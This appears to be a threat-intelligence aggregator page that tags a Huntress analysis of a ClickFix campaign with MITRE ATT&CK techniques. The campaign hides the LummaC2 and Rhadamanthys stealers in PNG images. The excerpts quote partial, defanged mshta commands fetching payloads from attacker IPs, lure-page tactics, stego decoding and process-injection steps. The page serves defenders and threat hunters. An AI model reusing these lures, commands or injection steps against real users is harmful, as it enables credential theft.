TTPwire Vol. 1 · MITRE ATT&CK · Tagged

Huntress

ClickFix Gets Creative: Malware Buried in Images

2025-11-24

ATT&CK techniques detected

23 predictions
T1055.001 Dynamic-link Library Injection
97%
“the baseindex - these are decrypted by XORing 114 with (255 - red). Figure 23: snippet of deobfuscated stego algorithm - each row of pixels might be padded on 4-byte boundaries for performance. Stride is the total number of bytes per row, in memory (including an additional p…”
T1055.001 Dynamic-link Library Injection
95%
“decrypt the hardcoded strings and leverage find & replace operations to rename class, function and variable names. After doing so, we can see the actual entry point function, wvr[…redacted…]nmu.ojo[…redacted…]sgy(), runs the below: Figure 16: deobfuscated “real…”
T1204.004 Malicious Copy and Paste
95%
“update splash page in full-screen, displaying realistic “working on updates” animations that eventually conclude by prompting the user to follow the standard ClickFix pattern: open the Run prompt (Win + R), then paste and run the malicious command. How it starts: the robo…”
T1059.001 PowerShell
91%
“7: blob URL JavaScript copying the initial ClickFix command to the clipboard. Figure 8: diagram depicting the execution chain leading to LummaC2. Stage 1: mshta.exe. The initial command copied to the clipboard uses mshta.exe to execute a JScript payload: mshta hxxp://81.0…”
T1204.004 Malicious Copy and Paste
89%
“ClickFix gets creative: malware buried in images. This analysis details a multi-stage malware execution chain, originating from a ClickFix lure, that leads to the delivery of infostealing malware, including LummaC2 and Rhadamanthys. A notable discovery during analysis was the c…”
T1055.001 Dynamic-link Library Injection
83%
“.sht[…redacted…]ixr() is called. This function will then call wvr[…redacted…]nmu.ojo[…redacted…]sgy(), which begins the actual malicious execution: Figure 14: dnSpy output displaying the “real” entry point to the loader. We can observe large variable a…”
T1620 Reflective Code Loading
81%
“7: blob URL JavaScript copying the initial ClickFix command to the clipboard. Figure 8: diagram depicting the execution chain leading to LummaC2. Stage 1: mshta.exe. The initial command copied to the clipboard uses mshta.exe to execute a JScript payload: mshta hxxp://81.0…”
T1204.004 Malicious Copy and Paste
72%
“hosted on xoiiasdpsdoasdpojas[.]com, although both point to the same IP address 141[.]98[.]80[.]175, which was also used to deliver the first stage! Windows Update source: the source code of the Windows Update ClickFix lure site is not obfuscated, contains comments in …”
T1055.001 Dynamic-link Library Injection
68%
“decryption and .NET assembly loading. This code utilises bitwise XOR operations to decrypt the assembly. This .NET assembly is loaded, and the entry point is invoked to begin execution. Stage 3: stego loader assembly. The 3rd-stage .NET assembly acts as a loader for the 4th stag…”
T1027.003 Steganography
64%
“manifest resource from this assembly. From the config, the resource name cd8302542f494f4d8fbcb2d21425b316 is provided. Figure 18: dnSpy output displaying manifest resource. The manifest resource cd8302542f494f4d8fbcb2d21425b316 is encrypted using AES. Using the function cryptotyp…”
T1059.001 PowerShell
64%
“…oiiasdpsdoasdpojas[.]com (141.98.80[.]175) - Stage 3 (stego loader) -> … Rhadamanthys stealer. Figure 31: Rhadamanthys stealer execution chain. 2025-10-17 - Report 5 - Windows Update ClickFix. Domain: N/A - Stage 1 (mshta): hxxp://141.0x62.80[.]175 …”
T1204.004 Malicious Copy and Paste
62%
“…ress has tracked a few clusters of ClickFix activity associated with this Windows Update campaign. One of the clusters involves the IP address 141.98.80[.]175, which has been used to deliver the first-stage and 2nd-stage payloads on Huntress partners since October 1: 2…”
T1204.001 Malicious Link
60%
“ClickFix gets creative: malware buried in images. This analysis details a multi-stage malware execution chain, originating from a ClickFix lure, that leads to the delivery of infostealing malware, including LummaC2 and Rhadamanthys. A notable discovery during analysis was the c…”
T1059.001 PowerShell
55%
“…62.80[.]175/gpsc.dat - Stage 2 (PowerShell): securitysettings[.]live (141.98.80[.]175) - Stage 3 (stego loader) -> … Rhadamanthys stealer. 2025-10-13 - Report 3 - Windows Update ClickFix. Domain: N/A - Stage 1 (mshta): hxxp://141.0x62.80[.…”
T1055.001 Dynamic-link Library Injection
55%
“cycle, with the browser entering full-screen mode and displaying a genuine-looking Windows Update screen. At the end of the “update”, users are encouraged to follow the regular Win + R & Ctrl + V pattern to paste a malicious command. In these cases, the same execution chain…”
T1055.012 Process Hollowing
52%
“: snippet of deobfuscated C# code invoking process injection. We can decrypt the source to reveal how process injection is performed: Figure 25: snippet of C# source that is compiled on execution. The snippet above performs standard process injection, with the following aliases…”
T1055.012 Process Hollowing
50%
“proceeding with cleanup operations) - process -> TerminateProcess (terminates the target process after the payload has finished executing) - handle -> CloseHandle (releases handles to the process and thread objects). Stage 5 - Donut shellcode. The shellcode extracted using t…”
T1059.001 PowerShell
50%
“cycle, with the browser entering full-screen mode and displaying a genuine-looking Windows Update screen. At the end of the “update”, users are encouraged to follow the regular Win + R & Ctrl + V pattern to paste a malicious command. In these cases, the same execution chain…”
T1204.004 Malicious Copy and Paste
49%
“cycle, with the browser entering full-screen mode and displaying a genuine-looking Windows Update screen. At the end of the “update”, users are encouraged to follow the regular Win + R & Ctrl + V pattern to paste a malicious command. In these cases, the same execution chain…”
T1204.004 Malicious Copy and Paste
41%
“…x websites hosting this lure: Figure 35: pivoting to identify additional Windows Update lure sites. Conclusion: Huntress observed two distinct variants of the ClickFix lure during the investigation: a standard “robot verification” and a newer, more convincing “Windows Updat…”
T1059.001 PowerShell
37%
“…ress has tracked a few clusters of ClickFix activity associated with this Windows Update campaign. One of the clusters involves the IP address 141.98.80[.]175, which has been used to deliver the first-stage and 2nd-stage payloads on Huntress partners since October 1: 2…”
T1204.002 Malicious File
36%
“src = bloburl - var head = document.head || document.documentElement; - head.insertBefore(s, head.firstChild); additionally, we can see that after the script is loaded, the temporary blob: URL is revoked and removed: s.onload = function() { try { URL.revokeObjectU…”
T1055.001 Dynamic-link Library Injection
31%
“proceeding with cleanup operations) - process -> TerminateProcess (terminates the target process after the payload has finished executing) - handle -> CloseHandle (releases handles to the process and thread objects). Stage 5 - Donut shellcode. The shellcode extracted using t…”

Summary

Huntress uncovered an attack utilizing a ClickFix lure to initiate a multi-stage malware execution chain. This analysis reveals how threat actors use steganography to conceal infostealers like LummaC2 and Rhadamanthys within seemingly harmless PNGs.